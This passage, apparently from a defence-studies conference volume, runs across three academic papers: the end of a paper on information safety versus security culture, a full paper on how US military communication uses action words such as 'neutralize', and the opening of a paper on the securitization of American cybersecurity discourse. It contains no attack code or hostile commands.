The main difference between these literature streams is the industries in which the applications and research are done. Safety research tends to focus on industries with high risks, e.g. the nuclear industry, traffic or healthcare (e.g. Grote 2007, Harvey et al. 2001, Glendon & Stanton 2000). In these industries the biggest risks involve threats of human casualties, either to the employees or to customers or people in general. Information security literature is in many cases written from the viewpoint of information-intensive organizations, but the industry range is not as specific as in safety culture literature. The implicit differentiation in the use of the words safety and security seems to be that safety deals with risks that involve the potential of material or human casualties caused by the actions of people within the organization. Security is connected to threats that come from outside the organization; in the mentioned industries, e.g. terrorism is such a threat.
If this differentiation is taken to the immaterial world of information, both elements of safety and security are present. There are many elements in information security that do not deal with an outside threat; rather, many information security compromises can be recognized as accidents within the company. Information safety would be the concept that addresses these threats. These different approaches are contrasted in Table 1.
Table 1: The meanings of security and safety in different environments
Term | "Traditional" environment | Information environment
Safety | The protection against human or material casualties caused from within the organization | The protection against information loss or damages caused from within the organization
Security | The protection against human or material casualties caused from outside the organization | The protection against information loss or damages caused from outside the organization
The benefit of the distinction between information security and information safety would be that the internal threats and external threats would get equal consideration. Today the emphasis tends to be on external threats and the technical protection mechanisms (Siponen 2000, von Solms & von Solms 2004). In today's world security culture does not need much emphasis. Terrorist threats, information leaks, and the like are very much on the minds of all nations, organizations and individuals. Safety culture, on the other hand, might need more effort. Danger from within is more difficult to recognize, because when people get used to the environment they act in, they get blindsided by habit (Taleb 2008). What once was a safe action may change into an unsafe action due to the changed circumstances. A positive safety culture requires active spotting of potential threats, be it technical failures, human error or intentional breaking of the instructions.
6. Conclusions
As seen in the previous section, the terms safety and security are taken for granted in the literature that uses them. The conscious examination of what safety culture and security culture mean could benefit companies in the context of information and knowledge. In information security the threats are traditionally seen to originate from outside the organization. From the culture perspective this means that there is a shared belief in the organization that the main threats to information come from outside. An information safety culture viewpoint would complement this by adding the internal perspective. The safety perspective of the organization not harming others is also relevant in the context of information and knowledge, as can be seen for example from the contemporary case of Wikileaks. The information that was leaked from US government agencies did not only harm these agencies, but caused problems to various other actors.
Organizational culture is defined to be a complex construct with multiple layers and aspects to it. As subcultures, security culture and safety culture are complex as well and deserve appropriate attention. The attempts to measure safety or security culture with one-dimensional measures have not provided the desired results. This should lead to appreciation of the complexity and multidimensionality of the cultures, and to profound consideration of which layers of the culture are possible to measure and affect. After that the employees of the organization can be empowered to promote the safety and security of the organization in many aspects, health as well as information.
This paper is linked to the doctoral dissertation work of the author, which includes conceptual analysis of knowledge security. The dissertation is situated between the fields of knowledge management and information security, and the literature researched for this paper triggers interesting perspectives on the dissertation topic. Especially in connection with knowledge that is embedded in the employees of a company, both the security and safety aspects would need to be considered.
References
Clarke, S. 2000, "Safety culture: under-specified and overrated?", International Journal of Management Reviews, vol. 2, no. 1, pp. 65-90.
Cooper, M.D. 2000, "Towards a model of safety culture", Safety Science, vol. 36, no. 2, pp. 111-136.
Denison, D.R. 1996, "What is the Difference between Organizational Culture and Organizational Climate? A Native's Point of View on a Decade of Paradigm Wars", The Academy of Management Review, vol. 21, no. 3, pp. 619-654.
Díaz-Cabrera, D., Hernández-Fernaud, E. & Isla-Díaz, R. 2007, "An evaluation of a new instrument to measure organisational safety culture values and practices", Accident Analysis & Prevention, vol. 39, no. 6, pp. 1202-1211.
Glendon, A.I. & Stanton, N.A. 2000, "Perspectives on safety culture", Safety Science, vol. 34, no. 1-3, pp. 193-214.
Grote, G. 2007, "Understanding and assessing safety culture through the lens of organizational management of uncertainty", Safety Science, vol. 45, no. 6, pp. 637-652.
Guldenmund, F.W. 2000, "The nature of safety culture: a review of theory and research", Safety Science, vol. 34, no. 1-3, pp. 215-257.
Guldenmund, F.W. 2007, "The use of questionnaires in safety culture research – an evaluation", Safety Science, vol. 45, no. 6, pp. 723-743.
Harvey, J., Bolam, H., Gregory, D. & Erdos, G. 2001, "The effectiveness of training to change safety culture and attitudes within a highly regulated environment", Personnel Review, vol. 30, no. 6, pp. 615-636.
Martin, J., Feldman, M.S., Hatch, M.J. & Sitkin, S.B. 1983, "The Uniqueness Paradox in Organizational Stories", Administrative Science Quarterly, vol. 28, no. 3, Organizational Culture, pp. 438-453.
Martins, A. & Eloff, J.H. 2002, "Information Security Culture", in Security in the Information Society, IFIP/SEC2002, Kluwer Academic Publishers, Boston, p. 203.
Paalumäki, A. 2010, Organisaatiokulttuuri tutkimusalueena, TTY Turvallisuuskulttuuriseminaari, 23.11.2010.
Reiman, T. & Oedewald, P. 2010, Turvallisuuskulttuuri osana organisaatiokulttuuria, TTY Turvallisuuskulttuuriseminaari, 23.11.2010.
Ruighaver, A.B., Maynard, S.B. & Chang, S. 2007, "Organisational security culture: Extending the end-user perspective", Computers & Security, vol. 26, no. 1, pp. 56-62.
Schein, E. 1984, "Coming to a New Awareness of Organizational Culture", Sloan Management Review, vol. 25, no. 2, pp. 2-16.
Schlienger, T. & Teufel, S. 2003, "Analyzing information security culture: increased trust by an appropriate information security culture", Proceedings of the 14th International Workshop on Database and Expert Systems Applications, p. 405.
Siponen, M. 2000, "A conceptual foundation for organizational information security awareness", Information Management & Computer Security, vol. 8, no. 1, pp. 31-41.
Taleb, N.N. 2008, The Black Swan - the impact of the highly improbable, Penguin, London, 366 p.
Thomson, K., von Solms, R. & Louw, L. 2006, "Cultivating an organizational information security culture", Computer Fraud & Security, vol. 2006, no. 10, pp. 7-11.
Tsohou, A., Kokolakis, S., Karyda, M. & Kiountouzis, E. 2008, "Investigating Information Security Awareness: Research and Practice Gaps", Information Security Journal: A Global Perspective, vol. 17, no. 5, pp. 207-227.
von Solms, B. 2000, "Information Security - The Third Wave?", Computers & Security, vol. 19, pp. 615-620.
von Solms, R. & von Solms, B. 2004, "From policies to culture", Computers & Security, vol. 23, no. 4, pp. 275-279.
Strategic Communication and Revolution in Military Affairs: Describing Actions and Effects
Saara Jantunen
National Defence University, Helsinki, Finland
sijantunen@gmail.com
Abstract: Changes in the concept of war are reflected by descriptions of military action. This article introduces a parameter system for analyzing strategic communication, which points out the division of military communication into tactical-operational and strategic levels. The system includes the parameter of legitimity - whether an action is legitimate warfare or not. Second, it contains the good/bad parameter, which is manifested by the old tradition of glorification and demonization in war rhetoric. The focus of this paper is on discussing the third parameter: the exclusive parameter. It determines whether certain behavior is exclusive to 'us' or 'the other', is often our only cue to deciding what is strategic communication, and functions on the strategic level. This approach links linguistics to strategy studies.
Keywords: strategic communication, linguistics, RMA
1. Introduction
The legitimacy of warfare is one of the key themes in news reporting in the 21st century. During the war in Iraq, the Pentagon has been eager to remind the audience how committed they are to the Geneva conventions and the rules of war. The legitimacy of the war has been questioned, and depending on who is asked, the war may be called either a liberation operation, an attack, an invasion or a humanitarian intervention.
The prototype of a war is a battle that follows certain rules and norms, and where the war-waging parties are entitled to a defined selection of actions, such as attacking and defending, communicating and reconnoitering. These are terms that are associated with war and skills that are taught in every military academy.
Information warfare, however, speaks of both own and enemy action very differently. War crimes set aside, the enemy typically behaves in an immoral or cowardly way, as the enemy is demonized and 'self' is glorified. The hotter the battle, the less the adversary acts like a legitimate military force: terms such as terrorize, brutalize and kill women and children enter the lexicon.
In other words, military discourse has different parameters. First there is, as discussed above, the parameter of legitimity - whether an action is legitimate warfare or not. Then there is the good/bad parameter, which is manifested by the tradition of glorification and demonization in war rhetoric. This paper focuses on discussing the third parameter: the inclusive/exclusive parameter. This parameter determines whether certain behavior is inclusive or exclusive behavior for 'us' or 'the other'. It, as will be argued, is a cue to distinguishing rhetoric with strategic motives from other communication.
The descriptions of Action and Effects symbolize the current concept of warfare. Strategy has to be converted into communication. Action descriptions, the core of language (Halliday, 2004), have an important role in the narratives of warfare, where actions speak louder than words. As the nature of war evolves, the changes are reflected by language - in this case by the language of strategic communication.
2. 'New war': Revolution in Military Affairs and the Grand Military Narrative
The Revolution in Military Affairs (RMA) is to military affairs what the industrial revolution was to 19th century society. The evolution of technology has created a world of efficiency and speed. In warfare, this evolution is represented by concepts such as stealth technology, drones, new precision munitions and cyber warfare. The RMA is described as "a higher-tech, information-based type of warfare" which "will take a force that is smart and well educated, one that is comfortable with technology and can think critically" (Pang, 1997). In order to finance the RMA, another revolution was needed: the revolution in business affairs. The use of the term revolution (instead of evolution) emphasizes the active efforts in decision-making and the objectives of the military industry, and the effects of the revolution in the private sector (through contractor agreements) can be seen in the business world. This 'revolution' affects the entire society.
155
Saara Jantunen
The Revolution in Military Affairs has manifested its essence in the Gulf War, Kosovo, Iraq and Afghanistan. These wars have demonstrated the technological gap between the adversaries. The lower end of this gap has been given multiple roles in the Grand Military Narrative, where it is referred to as terrorism or asymmetric warfare. As for cyberspace, the constant debates on the advancement of potential adversaries and the state of national cyber security keep cyber warfare high on the list of priorities.
The tradition of the Grand Military Narrative stems from the industrial age identity. Technology symbolises man-made evolution and is in the service of virtue. The possessors of technology make their own destiny. The Grand Military Narrative presents technology as a solution and prerequisite.
In warfare, this is manifested by concepts such as Effects Based Operations and the Comprehensive Approach. High-tech weapons are 'precise' and 'reduce collateral damage and civilian casualties' and help to rid the world of the 'bad guys'.
What makes this war 'new' is its spread to domains which have traditionally been seen as civilian. The military-industrial complex has resulted in the presence of companies such as Blackwater (or Xe) in Iraq, in civilian weapons manufacturers benefiting from the ongoing conflicts, and in military presence in entertainment and education. Technology is part of the American ideal of 'easy living' as it maximises output and minimizes input (citing Lyotard, 1984 in Rantapelkonen, 2006:73). Companies such as Raytheon develop exoskeleton suits that turn an overweight teenager into a human/terminator crossover (Raytheon, 2010). In the US, the military recruits from shopping malls by inviting the youth to play war with (Pentagon funded) computer games under the supervision of army recruiters (McLeroy, 2007). High school kids and college students are offered a chance to "earn respect", "get noticed by a nationwide cybersecurity community" and "help the U.S. beat the bad guys" by attending a "cyber challenge" competition (US Cyber Challenge, 2010). These projects all demonstrate the trend in the (r)evolution of warfare. Warfare symbolizes technology and distance, the "disappearance" (Virilio, 2009). Lyotard argues that technology is "good" because it is efficient, not because it is "true", "just" or "beautiful" (citing Lyotard, 1984, in Rantapelkonen, 2006:73).
The (r)evolution has thus created a gap between the adversaries, which has brought about a paradox in the attitudes towards technology. On one hand, there is the desire to develop technological capability, to be able to wage war from a distance, possibly anonymously, to combine effects with minimal effort, and to achieve minimal physical presence in the battlefield. These trends are argued with certain threat scenarios, such as global terrorism or the cyber capability of the adversary. On the other hand, these developments create a distance between the war-waging parties - asymmetry. The US is combating roadside and suicide bombings and cyber attacks, which are easy and cheap for the attacker to realize, and difficult to defend against. The American response to this is deterrence:
We must tailor deterrence to fit particular actors, situations, and forms of warfare. The same developments that add to the complexity of the challenge also offer us a greater variety of capabilities and methods to deter or dissuade adversaries. This diversity of tools, military and non-military, allows us to create more plausible reactions to attacks in the eyes of opponents and a more credible deterrence to them. In addition, changes in capabilities, especially new technologies, permit us to create increasingly credible defenses to convince would-be attackers that their efforts are ultimately futile. (2008 National Defense Strategy)
This is the Grand Military Narrative. Technology is both a threat and a solution: it creates the gap between the rich, hi-tech 'us' and the poor, low-tech 'them'. The American response to this threat is deterrence - in the form of technology. In military discourse the 'new war' is present in technology-centered descriptions of Action and Effects, discussed in the next chapter.
3. Strategic communication: The battle of narratives
NATO defines strategic communication as
the coordinated and appropriate use of NATO communications activities and capabilities - Public Diplomacy, Public Affairs (PA), Military Public Affairs, Information Operations (Info Ops) and Psychological Operations (PSYOPS), as appropriate - in support of Alliance policies, operations and activities, and in order to advance NATO's aims (Simon and Duzenli, 2009)
Instead of white, grey and black propaganda we now have strategic communication, a combination of public diplomacy (state/political level), public affairs (media) and information operations (military), previously also referred to as perception management (Taylor, 2003). Strategic communication is the vehicle for positive narratives that win the hearts and minds.
In US strategy, the need for the battle of narratives is recognized:
Dominating the narrative of any operation, whether military or otherwise, pays enormous dividends. Failure to do so undermines support for policies and operations, and can actually damage a country's reputation and position in the world. In the battle of narratives, the United States must not ignore its ability to bring its considerable soft power to bear in order to reinforce the positive aspects of Joint Force operations. Humanitarian assistance, reconstruction, securing the safety of local populations, military-to-military exercises, health care, and disaster relief are just a few examples of the positive measures that we offer. (United States Joint Forces Command, 2010)
In other words, the American military should be associated with positively evaluated narratives. Like the Comprehensive Approach that recognizes the need for both military and non-military resources in operations, strategic communication draws from the same resources:
The complexity of the future suggests that the education of senior officers must not remain limited to staff and war colleges, but should extend to the world's best graduate schools. Professional military education must impart the ability to think critically and creatively in both the conduct of military operations and acquisition and resource allocation. The Services should draw from a breadth and depth of education in a range of relevant disciplines to include history, anthropology, economics, geopolitics, cultural studies, the 'hard' sciences, law, and strategic communication. (United States Joint Forces Command, 2010)
Strategic communication manifested by the battle of narratives creates the need for discourse patterns and evaluation that "reinforce the positive aspects" of military operations. "At the end of the day, it is the perception of what happened that matters more than what actually happened." (United States Joint Forces Command, 2010)
In addition to narratives, the structures of language convey evaluations. Sometimes unfavourable decisions have to be made and actions taken. This inconvenience is coded in linguistic structure. As Lukin (2005: 6-7) argues, military operations are often described as having no scope: 'operations are conducted' as if the action was muted, without mention of the target of the action. Further, the lexical choices reflect the abstraction of military discourse:
Note the use of words like 'operations' and 'actions', or verb forms like 'operating', 'doing', and 'conducting', which are highly generalized terms covering for a whole range of more specific processes. So when General Franks says Our coalition special operations forces continue their actions throughout all of Iraq, this allows him to generalize away from the specific actions of 'attacking', 'destroying', 'killing', 'wounding', etc. (Lukin, 2005: 7)
Strategic communication would not report the enemy to 'conduct operations' or 'continue to move'. Instead, the enemy action would typically be lexicalized with more concrete, high-modality action descriptions. Language is ideological, and strategic communication uses it to advance its cause.
These action descriptions are at the very core of strategic communication. According to Foucault (2010: 105), the verb serves the function of affirmation: it declares that the person using the verb not only understands the names of things but evaluates them. Halliday's functional language theory shares this view and emphasizes Action as the core of language (see Halliday, 2004).
4. Actions and effects
In military discourse Actions are often represented by descriptions of Effects, which emphasize the end state. In this paper these Effects are divided into two groups, kinetic (physical) or informational.
Table 1 presents a list of Information Operations Effects, but as can be noticed, many of the descriptions are also used in conventional warfare:
Table 1: "Sample IO desired effects compiled from various sources" (as presented in Allen, 2005: 75)
Access | Diminish | Mislead
Cascading network failure | Dislocate | Negate
Control | Disrupt | Neutralize
Coordination failure | Distract | Operational failure
Create information vacuum | Divert | Paralysis
Decapitate | Exploit | Penetrate
Decision paralysis | Expose | Prevent
Defeat | Halt | Protect
Degrade | Harass | Read
Delay | Influence | Safeguard
Deny | Inform | Shape
Destroy | Interrupted | Shock
Desynchronize | Lose confidence in information | Stimulate
Deter | Lose confidence in network | Stop
 | Manipulate |
Actions/Effects are understood as either tactical-operational or strategic according to their communicative function. An Action description may have multiple readings, depending on its context. These two categories are discussed in the following chapter.
4.1 Tactical-operational Action descriptions
During a war or a military operation, there are a number of actions the participating forces may carry out. These actions may be referred to with action descriptions such as defend, attack, penetrate, target, control or destroy. In this paper, descriptions of this type are referred to as the tactical-operational level of communication. The function of this level of communication is to verbalize the actions in different theaters of war. The terms are concrete and applicable to both 'self' and the enemy.
This is not to say that tactical-operational Action descriptions are free of evaluation. When tactical-operational Action descriptions are applied to 'self', the purpose is often to demonstrate force and capacity. In turn, descriptions of the enemy defending are typically few. The terms clearly denote different levels of modality and appraisal. Defend has a lower modality than attack, and it is also more positive than negative: defence is always a legitimate action, whereas attacking signals greater use of force, either legitimate or illegitimate. The tactical-operational level engages the parameters of legitimacy and positivity/negativity.
The war in Iraq has been going for roughly one week. Good progress has been made. The coalition forces have control of the air. They have moved from the Iraq border in the south to within 50 miles of Baghdad. We have forces in the south, in the west, in the north. The so-called Republican Guard forces are ringing Baghdad some 40-50 miles away from it, and very likely that will be some of the toughest fighting that will occur and that's yet ahead of us. (Department of Defense, 2003a)
This can be understood as a description of an advancing military operation, although the text may have a rhetorical reading. Coalition forces are described as in control and their actions as successful. However, these descriptions are 'traditional' military vocabulary and can be analyzed as positive or negative, legitimate or illegitimate, and of low or high modality.
During the first days of the war in Iraq, Secretary of Defense Donald Rumsfeld (Department of Defense, 2003b) described the enemy as follows:
They took one person last week and cut his tongue out and left him to bleed to death in the public square. This is a vicious, vicious regime. If he tells one of his henchmen to go out and say that, and tells him precisely what to say, he either says it or he's shot.
The regime has committed acts of treachery on the battlefield dressing their forces as liberated civilians, and sending soldiers out waving white flags and feigning surrender, with the goal of drawing coalition forces into the ambushes; using Red Cross vehicles to courier military instructions. These are serious violations of the laws of war. The regime's actions have had little practical military effect thus far, but they do serve as a telling reminder of why it is important that this regime be removed.
These are examples of classic demonization. What is noteworthy is that the enemy is not described with the Action descriptions of the tactical-operational level. They do not attack or even destroy, but 'cut out tongues' and 'commit acts of treachery'. By not describing the enemy actions with descriptions of military action, the enemy is denied the status of a real military force, and associated with criminals and terrorists.
To summarize, tactical-operational Action descriptions have two main uses: they may aim at neutral communication, but demonizing is often done not by applying high-modality Action descriptions to enemy action, not even those that denote illegitimate action, but by reserving the tactical-operational lexicon for describing 'us' only. However, there is also a strategic level of communication, which contains descriptions of legitimate military action that are never applied to both 'self' and the enemy. This level will be discussed next.
4.2 Strategic Action descriptions
When Action descriptions become more abstract and less applicable to the enemy, there is also a shift from the tactical-operational level to the strategic level. Terms such as liberate and stabilize are examples of strategic level 'rhetorization', where ambiguity increases and the Action descriptions are superordinate terms that can be understood in several ways. The strategic level typically contains Action descriptions that are applicable to 'us' or 'them' only:
This war is an act of self defense, to be sure, but it is also an act of humanity. Coalition forces are eliminating a regime that is responsible for the deaths of hundreds of thousands of its own people and which is pursuing weapons that would enable it to kill hundreds of thousands more. (Department of Defense, 2003c)
While the enemy is described with a lexicon that is more applicable to criminals than to the military, the 'self' is glorified in several ways: in Iraq, the coalition forces were doing self defence (a word choice that denotes legitimacy) and eliminating a killer regime. Of course, in March 2003 self defence (lower modality) was carried out by a series of attacks (higher modality), and eliminating by whatever means were necessary to inflict enemy casualties. Both self defence and eliminate are more abstract and ambiguous than the given alternatives, and rarely, if at all, associated with enemy action.
What both the tactical-operational and the strategic level descriptions have in common is that they are usually clearly positive or negative, and it is possible to determine their level of modality compared to other Action descriptions. 'Self' is rarely associated with the negatively evaluated Action descriptions, unless there is a good rhetorical reason. 'Self' is described as resourceless and weak in cyber discourse (see Cybersecurity Act of 2009) as part of threat discourse, in order to securitize the internet.
In short, strategic motives behind discourse are recognizable from either strong evaluation or exclusion. Of all descriptions of Actions or Effects, the term neutralize is perhaps the best example of strategic level usage.
4.3 The semantic puzzle of the term 'neutralize'
When the war in Iraq started in March 2003, the Pentagon was quick to comment on its strategy and doctrine. Colonel Crowder (Chief, Strategy, Concepts and Doctrine) elaborated on the concept of Effects Based Operations (EBO):
Let me talk a little bit about how we do this. Everything -- first of all, there's not a target that we would strike that is not specifically struck to achieve a desired effect. And so we look at that target and we say, what do we want to do to that target? I want to neutralize or I want to destroy this bunker. And then I examine what munitions I might use to destroy that bunker. Ideally, if you could turn the lights off and make everybody go to sleep, that would be really nice. Unfortunately, some of our capabilities are not quite that advanced, and in many cases, we have to resort to physical destruction.
Here the Action descriptions neutralize and destroy are used contrastively. The US Department of Defence defines the terms neutralization and neutralize as follows (DOD Dictionary):
neutralization — (*) In mine warfare, a mine is said to be neutralized when it has been rendered, by external means, incapable of firing on passage of a target, although it may remain dangerous to handle.
neutralize — 1. As pertains to military operations, to render ineffective or unusable. 2. To render enemy personnel or material incapable of interfering with a particular operation.
These definitions emphasize that neutralizing is an action that lessens the target or object of action, makes it less (or not) capable of operating, and so removes the threat it poses. During the Iraqi war the term has been associated with the following objects:
Table 2: Configurations with the Process 'neutralize'
Action | Object | Year and source
neutralize | adversary forces | (Emmet, 1996)
neutralize | electrical power | (Department of Defense, 2003c)
neutralise | anti-Iraqi forces | (Department of Defense, 2006a)
neutralize | the enemy | (Department of Defense, 2006b)
neutralise | the threat | (Department of Defense, 2006c)
neutralize | bottom and moored mines | (Department of Defense, 2010b)
Here, neutralize carries a variety of meanings, from making ineffective or non-existent to destroying and killing. The practical use differs from the definition of the word.
In Taylor's (2007) categorization, neutralize is an Effect, categorized as a "long-term desired effect". It is listed along with terms that could be categorized as tactical-operational Action descriptions, such as decapitate, defeat, or stop. However, it is different from most Action (or Effect) descriptions: 'neutralize' operates on both the tactical-operational and the strategic level.
As the above chart demonstrates, neutralize is a term that can be used to describe both concrete, tactical-operational Actions, such as neutralizing mines or the enemy, and strategic Actions, such as neutralizing insurgency or a threat. The latter is much like the use of the term stabilize - an abstract subordinate term. These Action descriptions may refer to a variety of actions, and in fact these terms could be used synonymously. One may argue that both neutralizing and stabilizing could be achieved by the use of weapons, through education, development aid, or an embargo. The terms are ambiguous and multi-layered, which means they may be given several meanings. The fact that a term may operate on both the concrete and the abstract level adds to its ambiguity: neutralizing may be the result of an information operation or of the use of kinetic weapons.
Certain terms are exclusive in their use. As discussed earlier in this chapter, military discourse has a set of vocabulary for discussing 'self' and the enemy. Some of this vocabulary applies to both groups (attack, defend, operate, control). Demonising is always negative and always refers to the enemy, whereas glorifying is positive and refers to 'self'. Neutralize is a term that is, quite literally, neutral. It is very difficult to place it on the positive/negative or legitimacy parameters. However, it is one of the most used 'effect descriptions' of warfare based on system thinking. It is a term that is reserved for describing 'our' actions only - never the enemy's. This means that there is a third parameter: the inclusive/exclusive parameter that creates the distance between 'self' and the enemy without obvious evaluation.
Because neutralize is exclusive in its use, the term is neither tactical-operational nor value-free. The fact that its original definition and its practical usage differ from each other is evidence of rhetorization: speakers must have a reason for choosing a term that describes an Action of higher modality than the Action description actually used.
To summarize, the following figure demonstrates the parameter system when analyzing descriptions of Actions and Effects:
Figure 1: Parameter system
The concept of war has become ambiguous, and war has become distant. As a term, neutralize symbolizes this ambiguity and distance. Neutralizing is a tactic and strategy of Effects Based Operations and the Comprehensive Approach, of science and advancement, and it communicates the binary ideology of science in the service of virtue on the one hand, and dominance through destruction on the other. As a subordinate term, it covers a whole range of use of force without. As an Effect description, it symbolizes strategic communication in the linguistic tradition of the RMA.
5. Conclusion
Whether sterile or hostile, behind strategic communication there is an ideology of technological seclusion. This contradicts the views of Generals Petraeus and McChrystal, who argue for communicating and networking with the Afghan population. However, communication directed at the American public remains involved with narratives of the morally corrupt enemy and the omnipotence of technology. Even though people are now recognized as the center of gravity in warfare instead of weapons and technology, current military discourse still emphasizes deterrence and the role of technology. This is the result of the complex ties between the military industry and government. At the same time, the 'battle of narratives' pushes communication towards descriptions of 'soft power' and binary rhetoric.
The technology-centered perception of warfighting is resulting in discourse that increasingly describes Action as something enabled by and executed through technology. The paradox is in the representation: the words do not match the reality they refer to, or have no concrete representation in the physical world. Neutralize is an example of this. Abstract war requires abstract concepts to verbalize it.
References
Emmet, P. (1996) 'Six Emerging Trends in Information Management', Defense Issues, Volume 11, Number 16. [Online] Available: http://www.defense.gov/Speeches/Speech.aspx?SpeechID=885 [30 Jan 2011]
Foucault, M. (2010) Sanat ja asiat. Eräiden ihmistieteiden arkeologia. Helsinki: Gaudeamus.
Halliday, M.A.K. (2004) An Introduction to Functional Grammar. Revised by Matthiessen, C.M.I.M., London: Arnold.
Lukin, A. (2005) 'Information warfare: The grammar of talking war', Social Alternatives, Vol. 24, No. 1, First Quarter, pp. 5-10.
McLeroy, C. (2008) 'Army Experience Center opens in Philadelphia', Army News Service, 29 Aug. [Online] Available: http://www.army.mil/-news/2008/09/02/12072-army-experience-center-opens-in-philadelphia/ [30 Jan 2011]
Pang, F. (1997) 'Quality of Life: A Military Preparedness Priority', Defense Issues, Volume 12, Number 36. [Online] Available: http://www.defense.gov/speeches/speech.aspx?speechid=765 [30 Jan 2011]
Rantapelkonen, J. (2006) The Narrative Leadership of War: Presidential Phrases in the 'War on Terror' and their Relation to Information Technology. Doctoral Dissertation. Publication Series 1, Research n:o 34, Helsinki: National Defence University.
Raytheon (2010) 'Time Magazine Names the XOS 2 Exoskeleton "Most Awesomest" Invention of 2010'. [Online] Available: http://www.raytheon.com/newsroom/technology/rtn08_exoskeleton/ [30 Jan 2011]
Simon, G. & Duzenli, M. (2009) 'The comprehensive planning directive', NRDC-ITA Magazine, Issue nr. 14. [Online] Available: http://www.nato.int/nrdc-it/magazine/2009/0914/0914g.pdf [30 Jan 2011]
Taylor, P. (2003) Munitions of the Mind: A History of Propaganda from the Ancient World to the Present Day, 3rd edition, Manchester: Manchester University Press.
The Cybersecurity Act of 2009 (S 773 IS) (2009) Act. [Online] Available: http://frwebgate.access.gpo.gov/cgibin/getdoc.cgi?dbname=111_cong_bills&docid=f:s773rs.txt.pdf [30 Jan 2011]
United States Joint Forces Command (2010) The Joint Operating Environment 2010. [Online] Available: http://www.jfcom.mil/newslink/storyarchive/2010/JOE_2010_o.pdf [19 Oct 2010]
US Cyber Challenge (2010) USCC. [Online] Available: http://www.uscyberchallenge.org/ [2 Jan 2011]
US Department of Defense (2003a) DoD News Briefing - ASD PA Clarke and Maj. Gen. McChrystal, Transcript, 29 March. [Online] Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=2182 [30 Jan 2011]
US Department of Defense (2003b) DoD News Briefing - Secretary Rumsfeld and Gen. Myers, Transcript, 25 March. [Online] Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=2141 [30 Jan 2011]
US Department of Defense (2003c) Effects Based Operations Briefing, Transcript, 19 March. [Online] Available: http://www.defense.gov/Transcripts/Transcript.aspx?TranscriptID=2067 [30 Jan 2011]
US Department of Defense (2005) Defense Department Special Briefing on Security Operations in Baghdad, Transcript, 15 July. [Online] Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=3179 [30 Jan 2011]
US Department of Defense (2006a) DoD News Briefing with Col Snow from Iraq, Transcript, 30 June. [Online] Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=18 [30 Jan 2011]
US Department of Defense (2006b) DoD News Briefing with Maj. Gen. Thomas B. Turner II from Iraq, Transcript, 8 Sep. [Online] Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=3716
US Department of Defense (2006c) DoD News Briefing with Maj. Gen. Thomas B. Turner II from Iraq, Transcript, 6 Sep. [Online] Available: http://www.defense.gov/speeches/speech.aspx?speechid=1136 [30 Jan 2011]
US Department of Defense (2008) 2008 National Defense Strategy. [Online] Available: http://www.defense.gov/news/2008%20national%20defense%20strategy.pdf [30 Jan 2010]
US Department of Defense (2010a) DOD News Briefing with Secretary Gates and Adm. Mullen from the Pentagon. [Online] Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=4728 [30 Jan 2011]
US Department of Defense (2010b) Contracts Air Force No. 868-10, 23 Sep. [Online] Available: http://www.defense.gov/contracts/contract.aspx?contractid=4373 [30 Jan 2011]
Virilio, P. (2009) The Aesthetics of Disappearance, Translated by Philip Beitchman, Los Angeles: Semiotext(e).
A Case-Study on American Perspectives on Cyber and Security
Saara Jantunen and Aki-Mauri Huhtinen
National Defence University, Finland
sijantunen@gmail.com
aki.huhtinen@mil.fi
Abstract: In 2009, the Cybersecurity Act of 2009 was introduced to the U.S. Congress while the media were reporting about China's role in the Ghostnet network. In 2010, WikiLeaks and selected newspapers published confidential documents, stirring up a cybersecurity debate. This article discusses these narratives in the context of securitization. The methodology consists of linguistic theory, namely systemic functional language theory, and the securitization theory of the Copenhagen School. The analysis takes the form of an examination of the structures and evaluations of the action descriptions referring to the threat. As a result we can see that cyber discourse is synonymous with threat discourse. The agenda of cyber discourse is not purely about security, but is a reflection of the battle over cyber authority and the question of its status as a battle space.
Keywords: cyber, securitization, strategic communication, linguistics
1. Introduction
At the moment of writing this article, the debate on cybersecurity is more aggressive than ever. This article aims to provide a method for approaching threat discourses, using the concept of cybersecurity as an example. Not ignoring the themes of the debate, this article aims to contribute to the methods of analyzing security discourse and the linguistic structures of securitization.
Before discussing the linguistic properties of the cybersecurity debate, it is reasonable to discuss the past narratives linked to the topic.
After his inauguration, President Obama appointed Melissa Hathaway the Acting Senior Director for Cyberspace for the National Security and Homeland Security Councils. She led the so-called 60-day cybersecurity review project, which resulted in the Cyberspace Policy Review. At the same time, the Cybersecurity Act of 2009 was introduced by senators Rockefeller and Snowe. This Act will be discussed in more detail in the following chapters. However, it is not the only document concerned with cybersecurity issues. Papers such as Snooping Dragon and Ghostnet, as well as several government white papers, kept China and China's alleged cyber warfare aspirations in the headlines. In 2010 another cyber scandal emerged, when WikiLeaks started to publish leaked documents.
2. Cyber discourse in the 20th century
In 1990, the National Academy of Sciences released a report starting with the following phrases (Bendrath, 2004):
We are at risk. Increasingly, America depends on computers… Tomorrow's terrorists may be able to do more damage with a keyboard than with a bomb.
The opening phrase of the Cybersecurity Act of 2009 sounds rhetorically very similar:
The congress finds the following: America's failure to protect cyberspace is one of the most urgent national security problems facing the country.
And not only this. The hypothetical cyber attack is compared to that of 9/11, the biggest American trauma since Pearl Harbor:
[I]f the 9/11 attackers had chosen computers instead of air planes as their weapons and had waged a massive assault on a U.S. bank, the economic consequences would have been "an order of magnitude greater" than those caused by the physical attack on the World Trade Center.
These quotes are almost 20 years apart, but the rhetoric remains the same. Cyberspace is a threat, and it will replace traditional warfare and be just as lethal as, if not more lethal than, kinetic weapons. On the other hand, state adversaries exist side by side with cyber terrorism in the cyber rhetoric of the 21st century. According to Bendrath (2004), the word 'cyber' often has more to do with rhetoric and hidden agendas than with actual threats.
Bendrath (ibid.) states that media, government officials and intelligence agencies create a circle in which they think up worst-case scenarios. The same phenomenon was obvious in 2009. Rhetorical statements may land in bills and Acts, as was the case with the much-quoted Securing Cyberspace for the 44th Presidency report:
America's failure to protect cyberspace is one of the most urgent national security problems facing the new administration that will take office in January 2009.
The opening phrase of the first draft of the Cybersecurity Act of 2009 is not difficult to recognize:
America's failure to protect cyberspace is one of the most urgent national security problems facing the country.
The only difference is that instead of the administration, it is the whole country that is under threat. Extending the threat to the entire country brings the matter into the domain of government control.
